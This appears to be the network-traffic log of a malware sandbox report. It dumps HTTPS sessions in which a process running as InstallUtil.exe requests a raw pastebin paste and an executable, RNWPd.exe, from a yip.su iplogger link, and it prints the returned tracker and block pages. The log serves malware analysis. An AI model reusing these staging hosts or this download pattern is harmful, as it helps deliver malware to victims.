                                                2024-08-09 21:01:06 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                                                Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                                                2024-08-09 21:01:06 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                                                Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                                                2024-08-09 21:01:06 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                                                Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                                                2024-08-09 21:01:06 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:01:06 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649729172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:11 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:11 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae13ed244378-EWR
                                                2024-08-09 21:01:11 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:11 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:11 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:11 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.649730188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:12 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:12 UTC902INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:12 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r0yq9wGizc1cbFJUfgKz1uRCcyfl4Citexwr00jKLv1OE1Sd3xS5d%2B%2FySRxXYfVZ0MHovdxlXZ%2BxfPE%2BXLp50xHBoGelTu4XTAkYHJDRT4upPSNU5BwrNw%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae17fbac43e0-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:12 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:12 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                                                Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                                                2024-08-09 21:01:12 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                                                Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                                                2024-08-09 21:01:12 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                                                Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                                                2024-08-09 21:01:12 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                                                Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                                                2024-08-09 21:01:12 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                                                Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                                                2024-08-09 21:01:12 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.649731172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:17 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:17 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae39bb190f65-EWR
                                                2024-08-09 21:01:17 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:17 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
